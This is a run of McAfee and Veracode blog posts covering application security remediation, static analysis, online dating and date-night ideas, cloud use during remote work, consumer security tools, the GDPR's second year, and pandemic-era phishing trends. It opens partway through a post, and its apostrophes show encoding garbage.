In the meantime, go ahead and get yourself some protection that keeps you safer while you’re searching online. A good browser tool will alert you of any links and downloads that could wind up putting adware, spyware, or viruses on your device. Likewise, it can avert similar threats from misclicks and typos.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Entertainment #FromHome: What to do When You’re Bored at Home appeared first on McAfee Blogs.

Cracking the Code to a Successful Remediation Plan

Creating a remediation plan can be tricky. In fact, customers often tell us that it???s much easier to create a plan to help developers scan applications quickly and easily than it is to establish remediation goals. But if vulnerabilities aren???t remediated right away, there???s a higher chance that they will never be remediated.

Our recent State of Software Security (SOSS) report found that there???s about a 22 percent chance that a flaw will be fixed within a month of being discovered. If it???s not closed in the first month, the probability of remediation falls each month thereafter.

So what are some steps you can take to get started on a remediation plan for developers? First off, keep in mind that developers are responsible for more than just the security of their code, they are also responsible for the speed of deployments. This means that, just like security scans, remediation goals should be easy for the developer to follow and they should take time and resources into account. Second, consider incorporating remediation best practices or tips that have been proven successful, like the list below.

Provide developers with plenty of time to remediate flaws.

Developers need to be testing early and throughout the software development lifecycle (SDLC), preferably with automated scans that are integrated into their existing tools and processes. If developers are scanning early, it will give them the time they need to remediate flaws. If they wait until the end of the SDLC, it will be expensive and time-consuming to remediate flaws, which could dissuade the developer from making the necessary fixes. ツ?

Train developers on secure coding practices and leverage tools that provide real-time feedback and remediation advice directly within the IDE.

Most computer science curricula do not include security. So, when developers join your organization, it???s important that they receive secure code training. By writing secure code from the start, there will be fewer flaws or vulnerabilities for developers to fix down the line. If possible, you should also leverage tools that provide developers with real-time feedback and remediation advice while they code, like Veracode???s IDE scan. Veracode???s IDE scan helps developers remediate faster and learn on the job through positive reinforcement, remediation guidance, code examples, and links to Veracode AppSec Tutorials.

Help developers prioritize flaws based on severity.

Not all flaws are created equal. Some flaws are simply informational and aren???t a real threat to an application, while other flaws are considered ???High??? severity and need to be remediated immediately. When giving a flaw report to developers, make sure to outline the criticality of the flaws discovered by
mapping the flaws to possible exploitations, explaining what the exploit might mean to the business, and providing tips on what the developer can do to address ??? and reduce ??? the risks. For example, as stated in Securosis report, Building an Enterprise DevSecOps Program, you might be able to remediate a critical application vulnerability in code, patch supporting systems, disable the feature if it's not critical, block with IDS or firewalls, or even filter with WAF or RASP technologies. Developers do not understand exposure analysis, so it???s difficult for them to differentiate the severity of vulnerabilities. For flaws that are deemed ???High??? or ???Very High,??? consider having the tools break the build so the flaws can???t go unaddressed. For flaws that are not a risk to the business, don???t be afraid to tell the developers to do nothing.

Securosis

By working with developers to create a remediation plan, and incorporating the tips listed above, more flaws will be fixed, and your applications will be increasingly secure.

For additional information on working with developers to improve your AppSec program, check out our video, Tips for Unifying the Security Professional and Developer Roles.

Frequency, Speed, and Accuracy Are a Match Made in AppSec Heaven

???Make it work, make it right, make it fast.??? These words from renowned software engineer Kent Beck will always ring true for developers, especially with the pace of development picking up, not slowing down. A GitLab survey from last year showed nearly half (43 percent) of respondents deploy software on-demand or multiple times per day ??? that???s nonstop grinding to produce good code. But simply writing good code is not enough. Software developers must work smarter and faster if they want to stay one step ahead of attackers and meet tight deployment timelines in the process.

Aside from looming deadlines and threat actors who don???t sleep, where is the disconnect? In our 10th annual State of Software Security report (SOSS X), we discuss how some developers follow LIFO (Last In, First Out) or FIFO (First In, First Out) methodologies for fixing security flaws that they find when they scan their code. While these methods may work for some organizations, our data paints a clear picture: the chance of a security flaw being fixed in the first month is only about 22 percent for most organizations. It drops to 10 percent for the second month, then 3 to 5 percent the longer teams wait to revisit said flaw.

With the LIFO method, some development teams are prioritizing newer flaws over older flaws, yet their age doesn???t matter in many cases; they???re all threatening in their own way. And with the FIFO method, new flaws may pile up as teams focus on the vulnerabilities that they discovered first by assuming they take precedence. These methods are lacking an essential step: prioritization.

Fixing the right flaws, fast

The better approach is to scan frequently and fix the right flaws fast as they appear on the radar. Data from SOSS X shows us that frequent scanners (300+) have 5 times less security debt than infrequent scanners. Additionally, frequent scanners see a 3 times reduction in median time to remediation (MedianTTR).

The key to this approach? A comprehensive AppSec solution that blends security testing into each stage of the development pipeline and automates tasks wherever possible. It means you???re giving development teams the right scan, at the right time, in the right place so they can keep working, learning, and improving their code without halting projects.

Pipeline ???

That???s where the Veracode Static Analysis family of solutions comes into play, with automated security feedback right in the IDE and the pipeline to improve code as developers work. It also conducts a full policy scan before your team moves forward to deployment, providing a clear window into the flaws that developers should be focusing on directly as well as an audit trail for compliance. Here???s a breakdown:

My code. Feedback in the IDE is fast, showing up immediately while developers code. Not only are they then finding and fixing flaws as they work, but they???re learning what to do differently next time to avoid the buildup of flaws (and security debt) down the road. The Veracode Static Analysis IDE Scan returns results in 3 seconds on average and offers guidance for remediation, code examples, and links to Veracode AppSec Tutorials too, encouraging developers to improve every step of the way.

Our code. Within a median time of 90 seconds, the Veracode Static Analysis Pipeline Scan runs on every build and offers code feedback at the team level. The feedback is fast, pointing out flaws that are introduced on new commits, and providing insight into when teams need to break the build to remediate policy-violating flaws. Even better: it???s easy for development teams to adopt and learn how to use, so it won???t slow them down.

Production code. The Veracode Static Analysis Policy Scan in the CD pipeline is the icing on the cake. It conducts a full assessment of the code in about 8 minutes, on average. This scan provides an audit trail to satisfy compliance needs and gives a clear picture of the overall health of your application. It runs without manual tooling on the Veracode Static Analysis Engine, and it even has an impressive false-positive rate of less than 1.1 percent.

When it comes to false positives, reducing the rate of these pesky alarms is critical to improving speed and developer poise. The industry-leading 1.1 percent false-positive rate (without no tuning required) from Veracode Static Analysis, which is verified by thousands of scanned applications and customer data, is a whole lot faster than our competition???s 32 percent false-positive rate. That accuracy means you???re giving developers back time they would otherwise spend chasing down false flags so that they can focus on what matters most to their team and to the organization.

Upping your AppSec game

Frequency? Check. Speed? Check. Accuracy? Check. Veracode Static Analysis checks all the boxes for improving the security and quality of developer code, and then some. Standardizing on one SaaS solution that leans on automation and easy integration means this isn???t just a pipe dream. It???s achievable ??? even amidst accelerated shifts to digital ??? and we???re pretty sure it would make Kent Beck proud. ツ?

Check out our whitepaper for more information on the Veracode Static Analysis family and how it can help you manage your AppSec risk in world where frequency, speed, and accuracy matter most.

Online Dating #FromHome

Online safety

Online Dating #FromHome

Love finds a way. And that couldn’t be more true right now.

Even with so many singles keeping life close to home, dating apps have seen a big spike in downloads and usage. According to dating app Bumble, the end of March saw an 84% increase in the number of its video calls and voice chats. On March 29th, the Tinder dating app reported the highest number of swipes ever in one day—some 3 billion profiles got swept left or right. Should any of this surprise us?

Probably not. It only makes sense that people are turning to dating apps, as they’re designed to bring people together. So even though that may mean people can’t catch up in person, they still can catch up—at least virtually. And that’s important right now. We all know isolation from others isn’t easy, or healthy. There’s a good reason people are reaching out and making connections where they can.

How are people dating online right now?

I came across two articles on the topic the other day, both of which caught my eye—one from Time and another from Forbes. Even if you’re not dating, they’re both worth a read. Here’s what appears to be happening: people are pouring more hours into texting and video chatting on dating apps than before. Both articles offer plenty of anecdotes shared by daters, and whether or not they’re looking for a long-term relationship,  they’re looking to talk. What remains to be seen is how this may change the face of online dating in the long haul for this industry that accounts for $6 billion in sales each year worldwide.

These trends got me to thinking, so this article is for you or anyone you know who may be hopping onto an online dating app like Match, Bumble, Plenty of Fish, eHarmony, Tinder, or OkCupid. Think of it as an advice column of a different sort, where we talk about dating in light of your online privacy and safety. 

Protecting your privacy while dating online

For starters, we have a couple of previous blogs that offer sound advice about online dating. The first  covers ways you can protect your privacy when you’re using online dating apps, which starts with picking a dating app that has a good reputation. The second rounds out the topic with further online dating advice for adults and teens alike. Give them a look!

Go into dating feeling confident and secure.

Now for my two cents on the topic. It starts with basic hygiene. Digital hygiene, that is. Before you dive into a dating app, ensure that your device (and all your connected devices while you’re at it) has a comprehensive security solution in place. As you surf, chat, and meet up online, you’ll want to know that you’re protected against malware, viruses, phishing attacks, sketchy links, and so forth. Other features will come in handy (and be necessary as well), like ones that help you manage your passwords, protect your identity, safeguard your privacy, and more—all of which we’ll talk about in a bit.

Pick a winner

Picking the right app is like picking the right date. From a security standpoint,  these apps are the keepers of highly personal information about you, so you’ll want to know how they handle data, what privacy protections are in place, and what information they gather when you first sign up and what they continue to gather as you use the app. Do your research. Read up on their privacy policies. See what other people have to say about their experiences. And get a sense of what the app is all about. What’s its approach to dating? What kind of relationships are they focusing on? Make sure all of it feels right to you. 

Don’t get too personal

Only give the app the information that’s absolutely necessary to sign up. Dating apps ask questions so that they can help you find an ideal match, yet only share what you feel comfortable sharing. This is true from a personal standpoint, but it’s true from a security standpoint too. Anything you share along those lines could be at risk of a hack or a breach, the likes of which were reported by Wired and Forbes last year. If your info is compromised, it could lead to anywhere from identity theft to harassment, so when you use a dating app, keep the sharing to a minimum—and keep your eyes peeled for any suspicious activity across your social media, online accounts, and even your finances.

Passwords are your pal

Another password to remember! That’s just what you need, right? Right! It absolutely is, and a strong one is vital. You can create one and manage all of your passwords with a password manager like the True Key app. It’s free, and it’ll encrypt your passwords and use multi-factor authentication, which offers even further protection from hacks and attacks on your account.

Use a VPN for extra privacy

You can help keep your chats more private, and just about anything else you’re doing online, by using a VPN (virtual private network). For example, our VPN uses bank-level encryption to keep your personal data and activities private from hackers. And it’ll hide other information associated with your dating account while you’re online, like personal details, credit card numbers, and so forth. Given the security risks we’ve talked about so far, you’ll want to look into a VPN. 

Use caution with public Wi-Fi

If you’re not using a VPN on your device, don’t use your dating app on public Wi-Fi. The issue is this: plenty of public Wi-Fi hotspots aren’t secure. Someone else on the network could easily intercept the information you send over it, including your passwords, any photos you share, and any chats you have. In other words, using public Wi-Fi without protection is like opening a door that leads right to you and your most personal data. This applies to everything on public Wi-Fi, not just dating aps. If you use public Wi-Fi at all, you really should us a VPN.

Dating outside the app

There’s a pretty good chance that you have a video conferencing app or two available to you. You’re not alone. Market data agency App Annie reported that one video conferencing app saw downloads in Italy increase by nearly 425 time their previous average in March and by more than 2,300 times their previous average in Spain. Meanwhile in the UK, France, and Germany, the top video conferencing apps saw downloads increase by 11 to 30-fold during the same time.

If you’re thinking about using one of these to do a little dating outside of a dating app, or if you’re just using one keep up with family and friends, the advice here is do your research. Find out how secure they are and what privacy policies they have in place, particularly as some have experienced security issues as of late. For more, check out my recent article on video conferencing so you can help keep hackers and party crashers at bay when you’re chatting.

For example, look for one that uses end-to-end encryption so that the conference is protected from prying eyes and so that others can’t intrude upon the conversation uninvited. Look for articles from reputable sources too, like Consumer Reports, as there have been further reports of privacy issues where certain user information has been shared with third parties while using the video conferencing tool. 

In all, we’re leaning on technology so much more heavily right now and online dating is just one more instance of that. While online dating isn’t new, how we’re using it from home is, at least in a few ways. However you, your friends, or family go about that, be safe and have fun!

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Online Dating #FromHome appeared first on McAfee Blogs.

Date Night #FromHome Ideas

Date Night #FromHome ideas

“So, what movie should we watch?” The dreaded question. Twenty minutes of “mmm, maybe” later, you settle on an old episode of “The Office” and call it good. 

If that sounds a little too familiar, this post is for you. With so many of us having date night at home, now seems like a good time to throw out a few other options that look beyond streaming TV and movie queues. I chatted with a few friends, did a little looking around on the web, and came up with a few ways you and your loved one can hang out, chat, and simply settle into a great evening together.  

Bake Stuff, Make Stuff, Do Stuff

Verbs like bake, make, and do are a great place to start. Even at home, there are plenty of ways to get active together. A little searching online will turn up a number of ideas, as numerous website, and brands are offering all kinds of free content that can get you moving and doing things. (Related, if the two of you want to learn a language or take a class together, check out my previous article on personal and professional development from home.) Here are a few ideas:

25 Goodies You Can Bake Together

Hop into the kitchen, crank up some tunes, and whip up some comfort food, like cheesecake-stuffed chocolate chunk banana bread muffins or some cinnamon sugar apple cake. This article from Huffpost has those recipes and more, which are bound to taste even better when you bake them together.

Take a Photography Class Together

Practically all of us have a camera thanks to our phones, and as of this writing Nikon is offering their photography classes for free at Nikon School Online. While some of the classes focus on some of their cameras and equipment, they also have general courses on photographing kids and pets, photography fundamentals, and macro photography too.

Work Out Together

Quite on the other end of the spectrum from movie night is workout night, or afternoon, or whenever. Grabbing a workout is not only great for your body, it’s great for your head. Life Time has all kinds of workouts available for free online, including cardio, strength, and yoga for all levels. There are even some family courses too.

Wind Down Together with Some Yoga

Yoga with Adriene is great. She’s been featured in numerous fitness blogs and her YouTube channel is well over 7 million subscribers. Check out her free yoga sessions. Her approach is quite unique, with sessions built not only around fitness goals, but moods and headspaces as well. Sessions range anywhere from 5 to 45 minutes, with plenty of options for beginners, so you can take your pick.

Virtual Museum Tours

Okay, so nothing beats the real thing. But it’s nice to know that even if some of the world’s greatest museums are closed right now, we can take some pretty amazing guided tours on our laptops or tablets together. Here are just a few of the many—a simple search for virtual museum tours will turn up plenty.

Tour the Louvre

The Louvre, expansive as it is, hosts not one but seven different virtual tours of its museum. The virtual tour page for the Louvre offers a number of exhibitions, along with a virtual tour of Egyptian antiquities and several other online resources for exploring its collections.

Go to the Guggenheim

The two of you can virtually stroll along the Guggenheim’s famous spiral walkway and take in its Impressionist, Post-Impressionist, and Contemporary art along the way. The museum has further options for the two of you to explore its collections and history from home here on the “Guggenheim from Home” page as well.

Check Out Rembrandt, Dali, and More in Spain

The website for Madrid’s Thyssen-Bornemisza Museum houses 87 virtual tours  (yes, 87!) featuring greats like Gauguin, El Greco, Van Gogh, along with the work of American Impressionists, Pop artists, Surrealists, and more.

Step Inside Air Force One and 11 Other Famous Planes

Seattle’s Museum of Flight currently hosts the first presidential jet plane, a Boeing 707-120, delivered for President Eisenhower, which you can visit as part of the flight museum’s 3D tours. It’s one of the many classic planes you can climb inside, along with NASA’s Space Shuttle trainer. The site is loaded with galleries

Unplug with Game Night

If you want to get away from screens entirely, game night provides a great escape—and plenty of time to simply sit together, chat, and laugh as you play. We have plenty of gamers here at McAfee, who are among the many who have revitalized tabletop gaming in recent years by looking for fresh ways to connect with friends and family after a screen-heavy day. 

If you haven’t picked up a board game in ages, “game night” might conjure up sessions of Monopoly or Clue. That’s changed. The games that today’s designers have whipped up during the recent renaissance will come as a surprise—and offer you two some together time. 

Azul

This one is beautiful. Inspired by the Moorish tiles of Portugal, Azul is a game of pattern placement with wonderfully wrought tiles of its own. Completing specific patterns and sets racks up points but wasted tiles “fall to the floor” and cost you points in return. It’s tactile, colorful, and lends itself to conversation. You can knock out a game in 45 minutes or less and it plays great with two people.

Lost Cities

Take a head-to-head card game, an adventurous archeological expedition theme, and mix it in with quick-playing rules that are easy to teach, and you get Lost Cities. It’s an excellent game for couples because there’s just enough suspense and strategy to the play to make it fun—but not so deep that you find yourself sitting in silence. It pairs well with your favorite music and relaxing beverage of choice.  

Ticket to Ride

If you like a little more competition in your games, this game of building a railway empire in 19th Century North America might be your thing. Ticket to Ride (and its many spin-offs) another game that you can learn in about 15 minutes, where you build routes that connect cities for quick points (like Los Angeles to Phoenix) and then string together stretches of connections for even bigger points (like Los Angeles to New York).  

Carcassonne

Modeled after the bucolic vistas of southern France, Carcassonne is a tile placement game where players collectively build a landscape full of cities, fields, roads, and cloisters—and claim points as they’re completed. It’s almost like a puzzle that you build together, with lots of strategy and risk-taking along the way. Half the fun is watching the map take shape as everyone takes their turn, and no two games end up looking alike.

On a side note, it may be tough to go shopping in your area right now. However, many local game stores and game cafes support online shopping, which is a fine opportunity to support a small business in your area. Likewise, you can find these and other games at larger online game stores and ecommerce retailers.

Playing It Safe When You Plug Back In

Whenever you hop online for that cooking class, workout, or tour, consider using protection that keeps you safer while you’re surfing—all so you can steer you clear of sketchy links, misclicks, typos, or bad downloads that could drop adware, spyware, or viruses on your device. Likewise, if any of these ideas lead you to a quick online shopping trip, take a moment to brush up on your security smarts with our latest article about online shopping scams and how to avoid them.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Date Night #FromHome Ideas appeared first on McAfee Blogs.

Working from Home in 2020: How Cloud Use Changed

2020 has been a tumultuous year, with health and economic stability shattered for most of the world in just months. For those in a fortunate position to do so, working from home has become the new norm, and will likely be for the foreseeable future. Major companies in the tech sector have cemented the practice, with Google for example announcing that its global workforce can remain home until the end of the year. Twitter was the first to announce that employees can work from home forever, if that is their preference.

It is a sign of our times and technological development that this is possible. The pace of development for cloud services met this moment near-perfectly. Over the past few years, we’ve reached a critical mass of businesses and employees who are ramped up and comfortable using collaboration services like Zoom, Webex, Slack, and Microsoft Teams. Storage apps like Box and collaboration suites like Microsoft (Office) 365 have largely replaced the software, thumb drives, and network storage we used to manage files.

All of these services made our shift to working from home possible, and seamless for many. Companies that hadn’t ramped up yet on cloud-based collaboration and productivity apps are now on their way.

As a global provider of cloud security technology, we have a unique view into the use of cloud services and threats companies face in the cloud.  Using anonymized and aggregated metadata, we can derive trends across our vase base of 30 million enterprise cloud users.  The shift to working from home was a catalyst for us to dive into this data and uncover trends in how the world changed.

All of these findings are in our new report, the Cloud Adoption and Risk Report: Work from Home Edition. Grab the full copy below if you want to skip the preview here and go straight to the full set of findings.

 

First, use of all cloud services from every industry grew 50% overall from the start of 2020. However, some industries had to undergo more changes than others to enable working from home:

Manufacturing and education increased their cloud use by 144% and 114% respectively. Every parent of school-aged children has felt the shift in education practices over the past few months, with much of the burden falling to them to set up virtual classrooms or even teach their kids themselves. Manufacturing may be playing catch up – with less in-person meetings requiring immediate replacement by cloud-based tools.

Of all categories, collaboration services saw the largest increase in usage, up several hundred percent across the board. We all watched as the world restructured their social lives around Zoom, while enterprises increased their use of Webex even further, and ramped up on Slack and Teams to keep collaboration alive from a distance.

This increase in cloud use, particularly collaboration directly correlates to more data being stored in the cloud. We monitored not only these increases in service use, but also a new wave of threats targeting the wave of data entering the cloud.

We’ll dive into our threat research in part 2 of this series. To see our threat analysis before that blog is released, download the full report now.

 

The post Working from Home in 2020: How Cloud Use Changed appeared first on McAfee Blogs.

Cool and Helpful McAfee Tech to Help Secure Your Online Life

These days, we’re all actively engaging onlineWhether it’s my kids scrolling through social media, my wife video chatting with her friends and online shopping, or me checking my emails, we’re all leveraging the devices in front of us to keep our lives moving forward.   

What many people don’t realize is that there are technologies that we can implement into our daily online routines that will not only help us achieve our digital tasks more effectively but safeguard our privacy as well. If there’s a way I can browse the internet more quickly and securely than before, I’m here for it!  

Tools Anyone Can Use

There are a lot of free and easy-to-use technologies out there that can benefit you – you just need to learn what they are first! With that, let’s explore cool technologies that not too many people may know about, which can positively impact your online life.  

Safe Browsing Solutions

The internet is a vast sea of content, both good and bad. And we’re all navigating that sea to learn, work, and socialize online. But when you’re trying to browse as efficiently as possible, it can be tricky to tell the safe websites from the suspicious ones. That’s where a security solution like McAfee® WebAdvisor comes in to play.  

McAfee® WebAdvisor can help keep you safe from online threats like malware and phishing attempts while you surf the web. For example, the tool places a checkmark next to all the safe links, making security decisions much easier for the everyday internet user, like my wife when she’s on a mission to shop online. And it is free too! 

Virtual Private Network (VPN)

Even the average internet surfer like you and me should consider using a Virtual Private Network (VPN), as it essentially allows you to send and receive data across a public network as if it were a private network. A VPN encrypts  or scrambles  your information so others cant read it, helping to safeguard your data. VPNs are especially handy for when you are working remote or if you want full access to the internet while you’re traveling, or if you simply want to protect your privacy. McAfee® Safe Connect is a great and affordable option (with a limited free version available too) for users who are looking for a solution that is not only easy to implement, but one that also provides bank-grade encryption and private browsing to protect all online activities 

Password Managers

Speaking of pesky passwords, another way to easily secure your online accounts is with a password manager. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

While many password managers are free, its important users do their research and adopt password managers from companies they trust. Another option? Some password managers also come included in a comprehensive security solution, like McAfee® Total Protection. 

Robocall Blocking Apps

At one time or another, you’ve probably experienced a mysterious phone call from an “Unknown Caller.” If you’ve ever actually bothered to pick up one of these calls, you’ve likely heard a strange, robotic voice on the other end claiming to be from a certain organization or asking you to take action. Whether the call itself is just annoying or is coming from a criminal looking to scam consumers out of cash or information, one thing is certain – robocalls are a huge headache.  

Unfortunately, these pesky phone calls have shown no signs of slowing down. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. Luckily there are multiple robocall blocking apps and tools users can adopt to avoid phone spam. Additionally, you can register on the FCC’s National Do Not Call list for added protection. 

Multi-Factor Authentication

If you read my previous blog, you know that many of the common password habits that we use can lead to multiple security concerns. That said, passwords are just the first line of defense when it comes to securing online accounts – so what happens if a hacker makes it through that security barrier? Enter two-factor or multi-factor authentication.  

These days, most people have heard of two-factor authentication. To put it simply, the tech utilizes two checkpoints to verify the user’s identity. These could be answers to security questions, a one-time password texted to your smartphone, a fingerprint scan, or facial recognition. While two-factor authentication is a great starting point, there’s also multi-factor authentication – which, as it sounds, means a user must address multiple types of proof points before gaining access to an account or device. In fact, multi-factor authentication is becoming more and more intuitive thanks to artificial intelligence, as it can select a combination of authentication factors based on a user’s risk profile and habits.  

This technology is easy to integrate into your life, as it’s often a simple add-on to a lot of the things we already own. For example, you can activate face-ID on your iOS phone or fingerprint on your Android phone and boom, you’ve got two-factor authentication! 

Tools for Current McAfee Subscribers

Are you currently subscribed to McAfee® Total Protection or McAfee® LiveSafe? If so, there might be some cool tools within these solutions that you aren’t taking full advantage of that can help boost your security and improve your online experience. The more you know, right? 

For example, if you are a current McAfee® LiveSafe subscriber, you automatically have access to McAfee’s secure VPN and McAfee File Lock. If you are currently subscribed to McAfee® Total Protection, you have access to a whole host of security tools including a password manager and VPN. Additionally, McAfee® Total Protection gives you access to McAfee® Identity Theft Protectionwhich is a great tool for monitoring fraud. Finally, if you’re looking to delete some sensitive files, you can use McAfee® Shredder™ to completely ensure that no traces are left behind. By employing the full range of these tools, current McAfee subscribers can take their security to the next level and surf the internet without missing a beat.  

Cool Tech, Stronger Security

By taking advantage of these free, existing, and easily accessible tools, you can both improve every facet of your online life – whether that means social interactions, online shopping, or sending emails – and keep your information secure. You can have fun online and easily integrate security into your day-to-day which, in my opinion, is a win win. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Cool and Helpful McAfee Tech to Help Secure Your Online Life appeared first on McAfee Blogs.

The GDPR, Year II

With children, reaching the age of two is usually the change from a beautiful newborn to a moving creature that has reached the terrible twos.

It may be that the same is happening to the General Data Protection Regulation as it approaches the mark of its second year of enforcement: Data Protection Authorities (DPAs) seem to be paralyzed by limited budgets, a lack of resources, and most DPAs consider that the GDPR is not fully enforced. The Brave report issued by the Brave Community, a forum where people who care about the internet and their browsing experience come to discuss with each other, typically shows that only five of Europe’s 28 national GDPR enforcers have more than 10 tech specialists.  Half of EU GDPR enforcers have limited budgets (under €5 million), leading some/many/advocates? to believe that European governments have failed to properly equip their national regulators to enforce the GDPR. Recently, Brave even called on the European Commission to launch an infringement procedure against EU Member State Governments for failing to implement Article 52(4) of the GDPR, which provides that “Each Member State shall ensure that each supervisory authority is provided with the human, technical and financial resources, premises and infrastructure necessary for the effective performance of its tasks and exercise of its powers […]”.

Beyond enforcement challenges, the GDPR has gone through some major crises: first with Brexit and then with the outbreak of the COVID-19.

Though terrifying for many people, Brexit was handled relatively easily through a transition period, which goes until 31st December 2020, during which UK organisations are bound by two laws: the EU GDPR and the UK DPA (Data Protection Act 2018).

The EU GDPR will no longer apply directly in the UK at the end of the transition period. However, in reality, the Data Protection, Privacy and Electronic Communications (Amendments etc.) (EU Exit) Regulations 2019 amends the DPA 2018 and merges it with the requirements of the EU GDPR to form a data protection regime that will work in a UK context after Brexit, and with insignificant differences between the EU GDPR and the proposed UK GDPR. In short, organisations that process personal data should continue to comply with the requirements of the EU GDPR and doing so will meet the obligations in the UK as well. The only thing left to consider is to what extent the EU Commission will issue an adequacy decision in favour of the UK.

The second major crisis is the COVID 19 pandemic, which presented new challenges, among them new tracing apps,  the explosion of the use of remote workers at controllers, processors, and subprocessors, and questions about how employers ensure the health and safety of their workforce without compromising a data subjects privacy rights.  Additionally, hacker activity has been unprecedented, causing a sudden “mass exodus” home and (personal) data protection risks. “It’s like we’ve kicked over a hornet’s nest,” says Raj Samani, chief scientist at McAfee.

Data breaches are not limited to the ones resulting from hackers, but also by a simple data loss such as a corporate USB stick. Remote working weakens IT security for unprepared companies; vendors in some jurisdictions and in some roles did not have infrastructure in place to properly continue to offer their services after stay-at-home orders.

    • using inadequately secured private or mobile devices (lack of antivirus software, out-of-date operating system software, no encryption solutions, etc.) or using an unsecured Wi-Fi network;
    • using popular free messaging and meeting applications;
    • using social media platforms for business purposes;
    • not using VPN and other corporate solutions;
    • having no back-up plan;
    • lack of video surveillance
    • the proliferation of other people, Siri and Alexa and other listening/sensing devices

With respect to physically securing data

  • risk of loss during transfer of documents;
  • not adapting space at home for remote work purposes, making it possible to damage equipment or have sensitive documents stolen

With respect to the organization

  • having no fundamental business continuity measures in place and having no back-up equipment;
  • low awareness of employees where threats related to personal data protection were previously focused on risks present in normal work.

The threats are numerous, but mitigating the risk is not impossible and can still be done:

  • Draft (or update) a remote work policy and make sure there are processes around remote working. This might be a part of an existing Acceptable Use Policy or it might be a standalone document.
  • Inform your employees of the minimal security requirements for devices and networks they use, and have technical measures to ensure that your workforce is adhering to these requirements
  • Limit your employees to sanctioned messaging and meeting software and train your employees about how many popular applications may not provide for an adequate level of data protection and are usually not intended for business purposes.
  • Train your employees about why privacy and security are important generally.
  • Make sure the devices use the latest antivirus software and that employees have a VPN solution available when required by policy or their activities.

COVID-19 has marked the end of the World as we knew it before. Our lives may be impacted forever with new work styles, unprecedented cybersecurity issues, innovative policies, new hygiene rules and so on. The fight against COVID-19 is not just for the organisation, employees or customers but a joint effort from everyone. Obviously, organizations will need to rethink their cyber risk management in the Post COVID-19 and should not forget along the road the rules and the frame set by the GDPR whilst rebuilding the World After.

The GDPR has proved to be a robust tool to guide companies, officials and public health authorities in the response to the COVID-19 crisis and allocating the DPAs across the EU with increased financial and human resources will allow them to address the large number of complaints whilst it is up to the European Commission to ensure no human rights are violated.

 

The post The GDPR, Year II appeared first on McAfee Blogs.

Cyberthreats During the Pandemic Are on the Rise

With the sudden shift to digital that many businesses are facing in response to the pandemic, preventing cyberattacks is more important than ever. According to the FBI, attacks related to COVID-19 have increased 400 percent in recent months. And with data from Gartner showing that 74 percent of companies expect to maintain some level of remote workforce indefinitely, organizations can???t risk faltering when it comes to the health of their application security ??? both for their own business continuity and for the safety of their customer data.

The World Health Organization (WHO), which saw a staggering fivefold increase in attempts to target its own staff in April, warns that businesses and the general public alike are at an increased risk for email phishing attacks, which we know can lead to spoofing attacks. But it doesn???t stop there; malicious actors continue to exploit every angle possible, from brute force threats to manipulating services meant to help the general public. Businesses must be vigilant about how they???re handling security in this new normal, especially when issues with remote work arise. ツ?

The remote access conundrum

Chris Wysopal, Veracode???s co-founder and CTO, believes there may be even more risk on the horizon as organizations continue remote work through the course of the pandemic.

???I think we could definitely see more social engineering attacks with people pretending to be employees having problems with remote access. Also, new phishing attacks that take advantage of so many remote access procedures changing.ツ?Organizations hastily deploying remote access might not be securing it,??? Chris explains. ???There are a lot of companies that don???t make remote access a normal part of their business and may now need to do this.???

The rates we???re already seeing are staggering. Data from Atlas VPN shows a 350 percent increase in phishing sites detected by Google since January. And it???s no surprise that attackers are using a global event for financial gain; Verizon???s 2020 Data Breach Investigations Report highlights that 86 percent of surveyed breaches were financially motivated, with over 80 percent of hacking breaches involving brute force attacks or the use of stolen credentials through phishing.

Pandemic-related cyberattacks

The Verizon report also found that financially motived social engineering attacks are steadily increasing year over year, which means the global pandemic offers even more of an opportunity for threat actors. As everything has shifted to digital during the pandemic, these established trends present a virtual goldmine for malicious behavior. Here are some of the attacks we???ve seen that exploit this new normal:

Microsoft Teams: With increased remote work, organizations of all sizes are relying on communication tools like Microsoft Teams. Researchers from Abnormal Security discovered in April that attackers had been sending fake emails resembling Microsoft Teams notifications, phishing for employee credentials. The platform suffered two separate attacks, the first of which used URL redirects to send unsuspecting users to a domain hosting the attack. The second directed users to multiple YouTube pages before ultimately sending them to the phishing site where they may have exposed their credentials.

DocuSign: Researchers at Abnormal Security also discovered that a phishing email targeted 50,000 to 60,000 DocuSign users through Microsoft Office 365. The email, urging recipients to review a document about COVID-19, used a concealed malicious URL within the text, which brought users to a website phishing for credentials. Abnormal Security notes that this attack was particularly successful as DocuSign is an essential tool for signing online documents, especially at a time with dispersed workforces.

Instacart: As more people began using food delivery services to avoid grocery stores, they became a clear target for threat actors. A research firm recently alerted Instacart of a bug that would allow attackers to send malicious links to shoppers via text message. Attackers have also been sending malicious bots after browser extensions meant to help users grab coveted grocery delivery timeslots for services like Instacart.

10x Genomics: Healthcare organizations are at increased risk, too. In March, biotech research firm 10x Genomics was hit by an attack that resulted in stolen company data. The firm, which is compiling information related to COVID-19 to aid possible treatments, was able to isolate the attack quickly despite losing some sensitive information. Attackers reportedly leveraged REvil ransomware, which is also being used to exploit VPN and gateway vulnerabilities within healthcare organizations that are experiencing higher than usual strain due to the pandemic.

Protecting your business continuity

Malicious actors work hard to manipulate weak security protocols and unfixed vulnerabilities wherever possible, especially during times of widespread change and uncertainty. But there???s good news from Veracode: our Static Analysis scan numbers hit a record high in March and then hit another record high in April. Our customers are remaining vigilant about their security so they can continue to protect their data and the data of their own customers.

If you???re concerned about the state of your AppSec program or need guidance, we???re here to help ensure that you can maintain business continuity during the pandemic. Stay one step ahead of attackers by:

  • Shifting security left to the beginning of the software development lifecycle (SDLC) so that developers can write more secure code sooner rather than later.
  • Scanning earlier in the development process to catch flaws and scanning more often to reduce the risk that comes from security debt.
  • Utilizing penetration testing to locate information that may be used in social engineering or phishing attacks within your organization.
